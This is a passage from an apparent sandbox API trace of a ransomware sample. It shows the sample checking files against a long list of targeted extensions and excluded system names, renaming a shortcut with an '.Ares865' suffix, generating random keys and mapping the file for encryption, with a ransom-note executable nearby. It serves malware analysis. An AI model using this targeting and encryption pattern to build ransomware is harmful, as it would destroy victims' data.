[0058.639] lstrcmpiW (lpString1="lnk", lpString2="mud") returned -1 [0058.639] lstrlenW (lpString="mwb") returned 3 [0058.639] lstrcmpiW (lpString1="lnk", lpString2="mwb") returned -1 [0058.640] lstrlenW (lpString="myd") returned 3 [0058.640] lstrcmpiW (lpString1="lnk", lpString2="myd") returned -1 [0058.640] lstrlenW (lpString="ndf") returned 3 [0058.640] lstrcmpiW (lpString1="lnk", lpString2="ndf") returned -1 [0058.640] lstrlenW (lpString="nnt") returned 3 [0058.640] lstrcmpiW (lpString1="lnk", lpString2="nnt") returned -1 [0058.640] lstrlenW (lpString="nrmlib") returned 6 [0058.640] lstrcmpiW (lpString1="ss.lnk", lpString2="nrmlib") returned 1 [0058.640] lstrlenW (lpString="ns2") returned 3 [0058.640] lstrcmpiW (lpString1="lnk", lpString2="ns2") returned -1 [0058.640] lstrlenW (lpString="ns3") returned 3 [0058.640] lstrcmpiW (lpString1="lnk", lpString2="ns3") returned -1 [0058.640] lstrlenW (lpString="ns4") returned 3 [0058.640] lstrcmpiW (lpString1="lnk", lpString2="ns4") returned -1 [0058.640] lstrlenW (lpString="nsf") returned 3 [0058.640] lstrcmpiW (lpString1="lnk", lpString2="nsf") returned -1 [0058.640] lstrlenW (lpString="nv") returned 2 [0058.640] lstrcmpiW (lpString1="nk", lpString2="nv") returned -1 [0058.640] lstrlenW (lpString="nv2") returned 3 [0058.640] lstrcmpiW (lpString1="lnk", lpString2="nv2") returned -1 [0058.640] lstrlenW (lpString="nwdb") returned 4 [0058.640] lstrcmpiW (lpString1=".lnk", lpString2="nwdb") returned -1 [0058.640] lstrlenW (lpString="nyf") returned 3 [0058.640] lstrcmpiW (lpString1="lnk", lpString2="nyf") returned -1 [0058.640] lstrlenW (lpString="odb") returned 3 [0058.640] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0058.640] lstrlenW (lpString="odb") returned 3 [0058.640] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0058.640] lstrlenW (lpString="oqy") returned 3 [0058.640] lstrcmpiW (lpString1="lnk", lpString2="oqy") returned -1 [0058.640] lstrlenW (lpString="ora") returned 3 [0058.640] lstrcmpiW (lpString1="lnk", lpString2="ora") returned -1 [0058.640] lstrlenW (lpString="orx") returned 3 [0058.640] lstrcmpiW (lpString1="lnk", lpString2="orx") returned -1 [0058.640] lstrlenW (lpString="owc") returned 3 [0058.640] lstrcmpiW (lpString1="lnk", lpString2="owc") returned -1 [0058.640] lstrlenW (lpString="p96") returned 3 [0058.640] lstrcmpiW (lpString1="lnk", lpString2="p96") returned -1 [0058.641] lstrlenW (lpString="p97") returned 3 [0058.641] lstrcmpiW (lpString1="lnk", lpString2="p97") returned -1 [0058.641] lstrlenW (lpString="pan") returned 3 [0058.641] lstrcmpiW (lpString1="lnk", lpString2="pan") returned -1 [0058.641] lstrlenW (lpString="pdb") returned 3 [0058.641] lstrcmpiW (lpString1="lnk", lpString2="pdb") returned -1 [0058.641] lstrlenW (lpString="pdm") returned 3 [0058.641] lstrcmpiW (lpString1="lnk", lpString2="pdm") returned -1 [0058.641] lstrlenW (lpString="pnz") returned 3 [0058.641] lstrcmpiW (lpString1="lnk", lpString2="pnz") returned -1 [0058.641] lstrlenW (lpString="qry") returned 3 [0058.641] lstrcmpiW (lpString1="lnk", lpString2="qry") returned -1 [0058.641] lstrlenW (lpString="qvd") returned 3 [0058.641] lstrcmpiW (lpString1="lnk", lpString2="qvd") returned -1 [0058.641] lstrlenW (lpString="rbf") returned 3 [0058.641] lstrcmpiW (lpString1="lnk", lpString2="rbf") returned -1 [0058.641] lstrlenW (lpString="rctd") returned 4 [0058.641] lstrcmpiW (lpString1=".lnk", lpString2="rctd") returned -1 [0058.641] lstrlenW (lpString="rod") returned 3 [0058.641] lstrcmpiW (lpString1="lnk", lpString2="rod") returned -1 [0058.641] lstrlenW (lpString="rodx") returned 4 [0058.641] lstrcmpiW (lpString1=".lnk", lpString2="rodx") returned -1 [0058.641] lstrlenW (lpString="rpd") returned 3 [0058.641] lstrcmpiW (lpString1="lnk", lpString2="rpd") returned -1 [0058.641] lstrlenW (lpString="rsd") returned 3 [0058.641] lstrcmpiW (lpString1="lnk", lpString2="rsd") returned -1 [0058.641] lstrlenW (lpString="sas7bdat") returned 8 [0058.641] lstrcmpiW (lpString1="cess.lnk", lpString2="sas7bdat") returned -1 [0058.641] lstrlenW (lpString="sbf") returned 3 [0058.641] lstrcmpiW (lpString1="lnk", lpString2="sbf") returned -1 [0058.641] lstrlenW (lpString="scx") returned 3 [0058.641] lstrcmpiW (lpString1="lnk", lpString2="scx") returned -1 [0058.641] lstrlenW (lpString="sdb") returned 3 [0058.641] lstrcmpiW (lpString1="lnk", lpString2="sdb") returned -1 [0058.641] lstrlenW (lpString="sdc") returned 3 [0058.641] lstrcmpiW (lpString1="lnk", lpString2="sdc") returned -1 [0058.641] lstrlenW (lpString="sdf") returned 3 [0058.641] lstrcmpiW (lpString1="lnk", lpString2="sdf") returned -1 [0058.642] lstrlenW (lpString="sis") returned 3 [0058.642] lstrcmpiW (lpString1="lnk", lpString2="sis") returned -1 [0058.642] lstrlenW (lpString="spq") returned 3 [0058.642] lstrcmpiW (lpString1="lnk", lpString2="spq") returned -1 [0058.642] lstrlenW (lpString="te") returned 2 [0058.642] lstrcmpiW (lpString1="nk", lpString2="te") returned -1 [0058.642] lstrlenW (lpString="teacher") returned 7 [0058.642] lstrcmpiW (lpString1="ess.lnk", lpString2="teacher") returned -1 [0058.642] lstrlenW (lpString="tmd") returned 3 [0058.642] lstrcmpiW (lpString1="lnk", lpString2="tmd") returned -1 [0058.642] lstrlenW (lpString="tps") returned 3 [0058.642] lstrcmpiW (lpString1="lnk", lpString2="tps") returned -1 [0058.642] lstrlenW (lpString="trc") returned 3 [0058.642] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0058.642] lstrlenW (lpString="trc") returned 3 [0058.642] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0058.642] lstrlenW (lpString="trm") returned 3 [0058.642] lstrcmpiW (lpString1="lnk", lpString2="trm") returned -1 [0058.642] lstrlenW (lpString="udb") returned 3 [0058.642] lstrcmpiW (lpString1="lnk", lpString2="udb") returned -1 [0058.642] lstrlenW (lpString="udl") returned 3 [0058.642] lstrcmpiW (lpString1="lnk", lpString2="udl") returned -1 [0058.642] lstrlenW (lpString="usr") returned 3 [0058.642] lstrcmpiW (lpString1="lnk", lpString2="usr") returned -1 [0058.642] lstrlenW (lpString="v12") returned 3 [0058.642] lstrcmpiW (lpString1="lnk", lpString2="v12") returned -1 [0058.642] lstrlenW (lpString="vis") returned 3 [0058.642] lstrcmpiW (lpString1="lnk", lpString2="vis") returned -1 [0058.642] lstrlenW (lpString="vpd") returned 3 [0058.642] lstrcmpiW (lpString1="lnk", lpString2="vpd") returned -1 [0058.642] lstrlenW (lpString="vvv") returned 3 [0058.642] lstrcmpiW (lpString1="lnk", lpString2="vvv") returned -1 [0058.642] lstrlenW (lpString="wdb") returned 3 [0058.642] lstrcmpiW (lpString1="lnk", lpString2="wdb") returned -1 [0058.642] lstrlenW (lpString="wmdb") returned 4 [0058.642] lstrcmpiW (lpString1=".lnk", lpString2="wmdb") returned -1 [0058.643] lstrlenW (lpString="wrk") returned 3 [0058.643] lstrcmpiW (lpString1="lnk", lpString2="wrk") returned -1 [0058.643] lstrlenW (lpString="xdb") returned 3 [0058.643] lstrcmpiW (lpString1="lnk", lpString2="xdb") returned -1 [0058.643] lstrlenW (lpString="xld") returned 3 [0058.643] lstrcmpiW (lpString1="lnk", lpString2="xld") returned -1 [0058.643] lstrlenW (lpString="xmlff") returned 5 [0058.643] lstrcmpiW (lpString1="s.lnk", lpString2="xmlff") returned -1 [0058.643] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility\\Ease of Access.lnk.Ares865") returned 94 [0058.643] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility\\Ease of Access.lnk" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\accessibility\\ease of access.lnk"), lpNewFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility\\Ease of Access.lnk.Ares865" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\accessibility\\ease of access.lnk.ares865"), dwFlags=0x1) returned 1 [0058.645] CreateFileW (lpFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility\\Ease of Access.lnk.Ares865" (normalized: "c:\\users\\default user\\start menu\\programs\\accessories\\accessibility\\ease of access.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0058.645] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1358) returned 1 [0058.645] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0058.645] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0058.645] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0058.645] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0058.646] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0058.646] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.646] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x850, lpName=0x0) returned 0x120 [0058.647] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x850) returned 0x190000 [0058.648] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0058.649] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0058.649] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0058.649] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0058.649] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0058.649] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0058.649] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0058.649] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0058.649] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0058.649] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0058.650] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0058.650] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0058.650] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0058.650] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0058.650] CloseHandle (hObject=0x120) returned 1 [0058.650] CloseHandle (hObject=0x15c) returned 1 [0058.651] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0058.651] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0058.651] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0058.651] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49e30880, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49e30880, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0058.652] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0058.652] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a911c5d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x63b8b80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x1a98407e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4ea, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Magnify.lnk", cAlternateFileName="")) returned 1 [0058.652] lstrcmpiW (lpString1="Magnify.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0058.652] lstrcmpiW (lpString1="Magnify.lnk", lpString2="aoldtz.exe") returned 1 [0058.652] lstrcmpiW (lpString1="Magnify.lnk", lpString2=".") returned 1 [0058.652] lstrcmpiW (lpString1="Magnify.lnk", lpString2="..") returned 1 [0058.652] lstrcmpiW (lpString1="Magnify.lnk", lpString2="windows") returned -1 [0058.652] lstrcmpiW (lpString1="Magnify.lnk", lpString2="bootmgr") returned 1 [0058.652] lstrcmpiW (lpString1="Magnify.lnk", lpString2="temp") returned -1 [0058.652] lstrcmpiW (lpString1="Magnify.lnk", lpString2="pagefile.sys") returned -1 [0058.652] lstrcmpiW (lpString1="Magnify.lnk", lpString2="boot") returned 1 [0058.652] lstrcmpiW (lpString1="Magnify.lnk", lpString2="ids.txt") returned 1 [0058.652] lstrcmpiW (lpString1="Magnify.lnk", lpString2="ntuser.dat") returned -1 [0058.652] lstrcmpiW (lpString1="Magnify.lnk", lpString2="perflogs") returned -1 [0058.652] lstrcmpiW (lpString1="Magnify.lnk", lpString2="MSBuild") returned -1 [0058.652] lstrlenW (lpString="Magnify.lnk") returned 11 [0058.652] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Accessories\\Accessibility\\Ease of Access.lnk") returned 86 [0058.652] lstrcpyW (in: lpString1=0x2cce488, lpString2="Magnify.lnk" | out: lpString1="Magnify.lnk") returned="Magnify.lnk" [0058.652] lstrlenW (lpString="Magnify.lnk") returned 11 [0058.652] lstrlenW (lpString="Ares865") returned 7 [0058.652] lstrcmpiW (lpString1="ify.lnk", lpString2="Ares865") returned 1 [0058.652] lstrlenW (lpString=".dll") returned 4 [0058.652] lstrcmpiW (lpString1="Magnify.lnk", lpString2=".dll") returned 1 [0058.652] lstrlenW (lpString=".lnk") returned 4 [0058.652] lstrcmpiW (lpString1="Magnify.lnk", lpString2=".lnk") returned 1 [0058.652] lstrlenW (lpString=".ini") returned 4 [0058.652] lstrcmpiW (lpString1="Magnify.lnk", lpString2=".ini") returned 1 [0058.652] lstrlenW (lpString=".sys") returned 4 [0058.652] lstrcmpiW (lpString1="Magnify.lnk", lpString2=".sys") returned 1 [0058.652] lstrlenW (lpString="Magnify.lnk") returned 11 [0058.652] lstrlenW (lpString="bak") returned 3 [0058.652] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0058.652] lstrlenW (lpString="ba_") returned 3 [0058.652] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0058.652] lstrlenW (lpString="dbb") returned 3 [0058.653] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0058.653] lstrlenW (lpString="vmdk") returned 4 [0058.653] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0058.653] lstrlenW (lpString="rar") returned 3 [0058.653] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0058.653] lstrlenW (lpString="zip") returned 3 [0058.653] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0058.653] lstrlenW (lpString="tgz") returned 3 [0058.653] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0058.653] lstrlenW (lpString="vbox") returned 4 [0058.653] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0058.653] lstrlenW (lpString="vdi") returned 3 [0058.653] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0058.653] lstrlenW (lpString="vhd") returned 3 [0058.653] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0058.653] lstrlenW (lpString="vhdx") returned 4 [0058.653] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0058.653] lstrlenW (lpString="avhd") returned 4 [0058.653] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0058.653] lstrlenW (lpString="db") returned 2 [0058.653] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0058.653] lstrlenW (lpString="db2") returned 3 [0058.653] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0058.653] lstrlenW (lpString="db3") returned 3 [0058.653] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0058.653] lstrlenW (lpString="dbf") returned 3 [0058.653] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0058.653] lstrlenW (lpString="mdf") returned 3 [0058.653] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0058.653] lstrlenW (lpString="mdb") returned 3 [0058.653] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0058.653] lstrlenW (lpString="sql") returned 3 [0058.653] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0058.653] lstrlenW (lpString="sqlite") returned 6 [0058.653] lstrcmpiW (lpString1="fy.lnk", lpString2="sqlite") returned -1 [0058.653] lstrlenW (lpString="sqlite3") returned 7 [0058.653] lstrcmpiW (lpString1="ify.lnk", lpString2="sqlite3") returned -1 [0058.653] lstrlenW (lpString="sqlitedb") returned 8 [0058.653] lstrcmpiW (lpString1="nify.lnk", lpString2="sqlitedb") returned -1 [0058.654] lstrlenW (lpString="xml") returned 3 [0058.654] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0058.654] lstrlenW (lpString="$er") returned 3 [0058.654] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0058.654] lstrlenW (lpString="4dd") returned 3 [0058.654] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0058.654] lstrlenW (lpString="4dl") returned 3 [0058.654] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0058.654] lstrlenW (lpString="^^^") returned 3 [0058.654] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0058.654] lstrlenW (lpString="abs") returned 3 [0058.654] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0058.654] lstrlenW (lpString="abx") returned 3 [0058.654] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0058.654] lstrlenW (lpString="accdb") returned 5 [0058.654] lstrcmpiW (lpString1="y.lnk", lpString2="accdb") returned 1 [0058.654] lstrlenW (lpString="accdc") returned 5 [0058.654] lstrcmpiW (lpString1="y.lnk", lpString2="accdc") returned 1 [0058.654] lstrlenW (lpString="accde") returned 5 [0058.654] lstrcmpiW (lpString1="y.lnk", lpString2="accde") returned 1 [0058.654] lstrlenW (lpString="accdr") returned 5 [0058.654] lstrcmpiW (lpString1="y.lnk", lpString2="accdr") returned 1 [0058.654] lstrlenW (lpString="accdt") returned 5 [0058.654] lstrcmpiW (lpString1="y.lnk", lpString2="accdt") returned 1 [0058.654] lstrlenW (lpString="accdw") returned 5 [0058.654] lstrcmpiW (lpString1="y.lnk", lpString2="accdw") returned 1 [0058.654] lstrlenW (lpString="accft") returned 5 [0058.654] lstrcmpiW (lpString1="y.lnk", lpString2="accft") returned 1 [0058.654] lstrlenW (lpString="adb") returned 3 [0058.654] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0058.654] lstrlenW (lpString="adb") returned 3 [0058.654] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0058.654] lstrlenW (lpString="ade") returned 3 [0058.654] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0058.654] lstrlenW (lpString="adf") returned 3 [0058.654] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0058.654] lstrlenW (lpString="adn") returned 3 [0058.655] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0058.655] lstrlenW (lpString="adp") returned 3 [0058.655] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0058.655] lstrlenW (lpString="alf") returned 3 [0058.655] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0058.655] lstrlenW (lpString="ask") returned 3 [0058.655] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0058.655] lstrlenW (lpString="btr") returned 3 [0058.655] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0058.655] lstrlenW (lpString="cat") returned 3 [0058.655] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0058.655] lstrlenW (lpString="cdb") returned 3 [0058.655] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0058.655] lstrlenW (lpString="ckp") returned 3 [0058.655] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0058.655] lstrlenW (lpString="cma") returned 3 [0058.655] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0058.655] lstrlenW (lpString="cpd") returned 3 [0058.655] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0058.655] lstrlenW (lpString="dacpac") returned 6 [0058.655] lstrcmpiW (lpString1="fy.lnk", lpString2="dacpac") returned 1 [0058.655] lstrlenW (lpString="dad") returned 3 [0058.655] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0058.655] lstrlenW (lpString="dadiagrams") returned 10 [0058.655] lstrcmpiW (lpString1="agnify.lnk", lpString2="dadiagrams") returned -1 [0058.655] lstrlenW (lpString="daschema") returned 8 [0058.655] lstrcmpiW (lpString1="nify.lnk", lpString2="daschema") returned 1 [0058.655] lstrlenW (lpString="db-journal") returned 10 [0058.655] lstrcmpiW (lpString1="agnify.lnk", lpString2="db-journal") returned -1 [0058.655] lstrlenW (lpString="db-shm") returned 6 [0058.655] lstrcmpiW (lpString1="fy.lnk", lpString2="db-shm") returned 1 [0058.655] lstrlenW (lpString="db-wal") returned 6 [0058.655] lstrcmpiW (lpString1="fy.lnk", lpString2="db-wal") returned 1 [0058.655] lstrlenW (lpString="dbc") returned 3 [0058.655] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0058.655] lstrlenW (lpString="dbs") returned 3 [0058.655] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0058.656] lstrlenW (lpString="dbt") returned 3 [0058.656] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0058.656] lstrlenW (lpString="dbv") returned 3 [0058.656] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0058.656] lstrlenW (lpString="dbx") returned 3 [0058.656] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0058.656] lstrlenW (lpString="dcb") returned 3 [0058.656] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0058.656] lstrlenW (lpString="dct") returned 3 [0058.656] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0058.656] lstrlenW (lpString="dcx") returned 3 [0058.656] lstrcmpiW (lpString1="lnk", lpString2="dcx") returned 1 [0058.656] lstrlenW (lpString="ddl") returned 3 [0058.656] lstrcmpiW (lpString1="lnk", lpString2="ddl") returned 1 [0058.656] lstrlenW (lpString="dlis") returned 4 [0058.656] lstrcmpiW (lpString1=".lnk", lpString2="dlis") returned -1 [0058.656] lstrlenW (lpString="dp1") returned 3 [0058.656] lstrcmpiW (lpString1="lnk", lpString2="dp1") returned 1 [0058.656] lstrlenW (lpString="dqy") returned 3 [0058.656] lstrcmpiW (lpString1="lnk", lpString2="dqy") returned 1 [0058.656] lstrlenW (lpString="dsk") returned 3 [0058.656] lstrcmpiW (lpString1="lnk", lpString2="dsk") returned 1 [0058.656] lstrlenW (lpString="dsn") returned 3 [0058.656] lstrcmpiW (lpString1="lnk", lpString2="dsn") returned 1 [0058.656] lstrlenW (lpString="dtsx") returned 4 [0058.656] lstrcmpiW (lpString1=".lnk", lpString2="dtsx") returned -1 [0058.656] lstrlenW (lpString="dxl") returned 3 [0058.656] lstrcmpiW (lpString1="lnk", lpString2="dxl") returned 1 [0058.656] lstrlenW (lpString="eco") returned 3 [0058.656] lstrcmpiW (lpString1="lnk", lpString2="eco") returned 1 [0058.656] lstrlenW (lpString="ecx") returned 3 [0058.656] lstrcmpiW (lpString1="lnk", lpString2="ecx") returned 1 [0058.656] lstrlenW (lpString="edb") returned 3 [0058.656] lstrcmpiW (lpString1="lnk", lpString2="edb") returned 1 [0058.656] lstrlenW (lpString="epim") returned 4 [0058.656] lstrcmpiW (lpString1=".lnk", lpString2="epim") returned -1 [0058.656] lstrlenW (lpString="fcd") returned 3 [0058.656] lstrcmpiW (lpString1="lnk", lpString2="fcd") returned 1 [0058.656] lstrlenW (lpString="fdb") returned 3 [0058.657] lstrcmpiW (lpString1="lnk", lpString2="fdb") returned 1 [0058.657] lstrlenW (lpString="fic") returned 3 [0058.657] lstrcmpiW (lpString1="lnk", lpString2="fic") returned 1 [0058.657] lstrlenW (lpString="flexolibrary") returned 12 [0058.657] lstrlenW (lpString="fm5") returned 3 [0058.657] lstrcmpiW (lpString1="lnk", lpString2="fm5") returned 1 [0058.657] lstrlenW (lpString="fmp") returned 3 [0058.657] lstrcmpiW (lpString1="lnk", lpString2="fmp") returned 1 [0058.657] lstrlenW (lpString="fmp12") returned 5 [0058.657] lstrcmpiW (lpString1="y.lnk", lpString2="fmp12") returned 1 [0058.657] lstrlenW (lpString="fmpsl") returned 5 [0058.657] lstrcmpiW (lpString1="y.lnk", lpString2="fmpsl") returned 1 [0058.657] lstrlenW (lpString="fol") returned 3 [0058.657] lstrcmpiW (lpString1="lnk", lpString2="fol") returned 1 [0058.657] lstrlenW (lpString="fp3") returned 3 [0058.657] lstrcmpiW (lpString1="lnk", lpString2="fp3") returned 1 [0058.657] lstrlenW (lpString="fp4") returned 3 [0058.657] lstrcmpiW (lpString1="lnk", lpString2="fp4") returned 1 [0058.657] lstrlenW (lpString="fp5") returned 3 [0058.657] lstrcmpiW (lpString1="lnk", lpString2="fp5") returned 1 [0058.657] lstrlenW (lpString="fp7") returned 3 [0058.657] lstrcmpiW (lpString1="lnk", lpString2="fp7") returned 1 [0058.657] lstrlenW (lpString="fpt") returned 3 [0058.657] lstrcmpiW (lpString1="lnk", lpString2="fpt") returned 1 [0058.657] lstrlenW (lpString="frm") returned 3 [0058.657] lstrcmpiW (lpString1="lnk", lpString2="frm") returned 1 [0058.657] lstrlenW (lpString="gdb") returned 3 [0058.657] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0058.657] lstrlenW (lpString="gdb") returned 3 [0058.657] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0058.657] lstrlenW (lpString="grdb") returned 4 [0058.657] lstrcmpiW (lpString1=".lnk", lpString2="grdb") returned -1 [0058.657] lstrlenW (lpString="gwi") returned 3 [0058.657] lstrcmpiW (lpString1="lnk", lpString2="gwi") returned 1 [0058.657] lstrlenW (lpString="hdb") returned 3 [0058.657] lstrcmpiW (lpString1="lnk", lpString2="hdb") returned 1 [0058.657] lstrlenW (lpString="his") returned 3 [0058.657] lstrcmpiW (lpString1="lnk", lpString2="his") returned 1 [0058.657] lstrlenW (lpString="ib") returned 2 [0058.658] lstrcmpiW (lpString1="nk", lpString2="ib") returned 1 [0058.658] lstrlenW (lpString="idb") returned 3 [0058.658] lstrcmpiW (lpString1="lnk", lpString2="idb") returned 1 [0058.658] lstrlenW (lpString="ihx") returned 3 [0058.658] lstrcmpiW (lpString1="lnk", lpString2="ihx") returned 1 [0058.658] lstrlenW (lpString="itdb") returned 4 [0058.658] lstrcmpiW (lpString1=".lnk", lpString2="itdb") returned -1 [0058.658] lstrlenW (lpString="itw") returned 3 [0058.658] lstrcmpiW (lpString1="lnk", lpString2="itw") returned 1 [0058.658] lstrlenW (lpString="jet") returned 3 [0058.658] lstrcmpiW (lpString1="lnk", lpString2="jet") returned 1 [0058.658] lstrlenW (lpString="jtx") returned 3 [0058.658] lstrcmpiW (lpString1="lnk", lpString2="jtx") returned 1 [0058.658] lstrlenW (lpString="kdb") returned 3 [0058.658] lstrcmpiW (lpString1="lnk", lpString2="kdb") returned 1 [0058.658] lstrlenW (lpString="kexi") returned 4 [0058.658] lstrcmpiW 